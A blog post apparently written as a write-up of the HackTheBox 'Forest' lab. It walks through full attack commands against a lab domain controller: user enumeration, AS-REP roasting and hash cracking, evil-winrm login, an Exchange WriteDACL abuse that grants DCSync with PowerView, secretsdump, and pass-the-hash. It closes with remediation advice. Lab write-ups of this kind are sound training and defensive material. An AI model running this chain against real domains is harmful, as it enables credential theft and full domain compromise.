Hacking Insights by Max Bautista

Forest writeup

Forest writeup

Box name: Forest

Difficulty: Windows

OS: Windows

Overview: Forest is an easy Windows machine that showcases a Domain Controller (DC) for a domain in which Exchange Server has been installed. The DC allows anonymous LDAP binds, which are used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes, compromising the system.

Link: https://app.hackthebox.com/machines/Forest?sort_by=created_at&sort_type=desc

Machine IP: 10.129.2.111

Ran rustscan against the machine.

rustscan -a 10.129.2.111 –ulimit 5000 -b 2000 — -A -Pn 

Definitely looks like an AD machine. I was able to list users as guest.

What seems interesting so far is there is a bunch of mailboxes. Created a list with all of the users. Unfortunately no access to shares as guest. Added htb.local to /etc/hosts. Since we have users but no password’s yet I attempted AS-REP roasting.

GetNPUsers.py htb.local/ -dc-ip 10.129.2.111 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass

We get svc-alfresco’s hash. Running hashcat.

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Evil-winrm’ed into the victim and got user.txt.

evil-winrm -i 10.129.2.111 -u svc-alfresco -p s3rvice

I checked privs and groups of this user and Account Operators and Privileged IT accounts look interesting.

I poked around and did more research and got stuck here. I ended up peaking at the writeup- “Exchange Windows Permissions group has WriteDacl privileges on the Domain. The WriteDACL privilege allows a user to add ACLs to an object. We can add users to this group and give them DCSync privileges.” This checks out too as we saw a bunch of mailbox’s earlier. I should start using Bloodhound when I get stuck at these parts for AD machines to visualize and find a path. We can add a new user and provide those permissions.

net user kami kami123 /add /domain

net group ‘Exchange Windows Permissions’ kami /add

net localgroup ‘Remote Management Users’ kami /add

I uploaded PowerView.ps1 through evil-winrm.

upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1

Then ran it giving kami DCsync perms.

$pass = ConvertTo-SecureString ‘kami123’ -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential(‘htb.local\kami’, $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity “DC=htb,DC=local” -PrincipalIdentity kami -Rights DCSync

Then ran secretsdump and we get all of the hashes.

secretsdump.py ‘htb.local/kami:kami123@10.129.2.111’

Evilwin’ed into Adminsitrator with the hash and grabbed root.txt

GG

Attack Chain

1 – Reconnaissance Ran RustScan and identified a domain-joined Windows machine with ports including 53 (DNS), 88 (Kerberos), 135 (MSRPC), 389 (LDAP), 445 (SMB), and 5985 (WinRM). Added htb.local to /etc/hosts. Enumerated domain users via anonymous LDAP and guest RPC access. Noted a large number of mailbox accounts indicating Exchange Server was installed. Built a full user list. Guest SMB access returned no readable shares.

2 – ASREPRoasting and credential recovery Ran GetNPUsers against the enumerated user list to identify accounts with Kerberos pre-authentication disabled. The svc-alfresco service account returned an AS-REP hash. Cracked it with Hashcat using rockyou.

GetNPUsers.py htb.local/ -dc-ip 10.129.2.111 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Credentials recovered: svc-alfresco:s3rvice

3 – WinRM access and user flag Authenticated via evil-winrm as svc-alfresco and retrieved user.txt. Reviewed the account’s group memberships and identified membership in Account Operators and Privileged IT Accounts as notable.

evil-winrm -i 10.129.2.111 -u svc-alfresco -p s3rvice

4 – Exchange Windows Permissions abuse and DCSync Researched the Exchange group structure and identified that the Exchange Windows Permissions group held WriteDACL on the domain object. Used svc-alfresco’s Account Operators membership to create a new user and add them to Exchange Windows Permissions and Remote Management Users. Uploaded PowerView.ps1 via evil-winrm and used Add-DomainObjectAcl to grant the new user DCSync rights on the domain. Ran secretsdump to dump all domain hashes.

net user kami kami123 /add /domain net group ‘Exchange Windows Permissions’ kami /add Add-DomainObjectAcl -Credential $cred -TargetIdentity “DC=htb,DC=local” -PrincipalIdentity kami -Rights DCSync secretsdump.py ‘htb.local/kami:kami123@10.129.2.111’

5 – Pass the hash as Administrator Used the Administrator NTLM hash recovered from the DCSync dump with evil-winrm to authenticate and retrieved root.txt.

Key Takeaways

  1. Anonymous LDAP bind enabling full user enumeration – The domain controller allowed unauthenticated LDAP queries returning all domain user objects. Anonymous LDAP bind must be disabled on all domain controllers and LDAP signing and channel binding must be enforced via Group Policy.
  2. ASREPRoasting due to pre-authentication disabled on svc-alfresco – The service account had Kerberos pre-authentication disabled allowing an unauthenticated attacker to request an AS-REP hash and crack it offline. Kerberos pre-authentication must be enabled on all accounts without exception and any service account requiring it disabled must use a password of at least 25 randomly generated characters.
  3. Weak service account password crackable with rockyou – The svc-alfresco password was in the rockyou wordlist. Service account passwords must be long randomly generated strings managed through a PAM solution and rotated regularly. A crackable service account password in an Exchange environment is a domain compromise waiting to happen.
  4. Exchange Windows Permissions group holding WriteDACL on the domain – The Exchange group’s WriteDACL right on the domain object allowed any member to grant themselves or others DCSync privileges. This is a well-documented Exchange privilege escalation path. Exchange permissions on the domain object must be audited and scoped down to the minimum required. Microsoft has released mitigations for this configuration which must be applied.
  5. Account Operators membership enabling user creation and group manipulation – svc-alfresco’s Account Operators membership allowed creating domain users and adding them to privileged groups, providing the pivot needed to abuse the Exchange WriteDACL right. Service accounts must never hold Account Operators or other privileged group memberships beyond what is explicitly required for their function.

Remediation

[Immediate] Disable anonymous LDAP bind Configure all domain controllers to require authentication for LDAP queries. Set the dsHeuristics attribute to disable anonymous access and enforce LDAP signing and channel binding via Group Policy. This prevents unauthenticated user enumeration which is the first step in this attack chain.

[Immediate] Enable Kerberos pre-authentication on svc-alfresco Enable pre-authentication on the svc-alfresco account immediately using Set-ADAccountControl -Identity svc-alfresco -DoesNotRequirePreAuth $false. Audit all domain accounts for the DONT_REQ_PREAUTH flag and enable pre-authentication on every account found. Rotate the svc-alfresco password to a randomly generated string of at least 25 characters.

[Immediate] Apply Microsoft Exchange security mitigations for WriteDACL Apply the Microsoft-recommended Exchange domain permissions mitigations to remove unnecessary ACLs granted by the Exchange setup process. Run the provided mitigation script from Microsoft to scope down Exchange group permissions on the domain object. Audit all Exchange-related group memberships and their effective permissions on Active Directory objects.

[Immediate] Rotate all credentials recovered via DCSync All domain account hashes obtained through the DCSync attack must be considered fully compromised. Initiate a domain-wide password reset for all privileged accounts and rotate the Administrator password to a randomly generated string managed through a PAM solution.

[Short-term] Remove svc-alfresco from Account Operators Audit the svc-alfresco account and all other service accounts for membership in privileged built-in groups including Account Operators, Backup Operators, and Print Operators. Remove any memberships that are not explicitly required for the service function. Service accounts must operate under the principle of least privilege.

[Long-term] Deploy BloodHound and implement continuous AD attack path monitoring Run BloodHound regularly to identify attack paths including Exchange WriteDACL abuse, ASREPRoastable accounts, and Account Operators membership chains. Implement SIEM detection rules for DCSync activity, WriteDACL modifications, and AS-REP requests without pre-authentication. Include Active Directory and Exchange privilege escalation paths in the regular penetration testing scope.

Leave a comment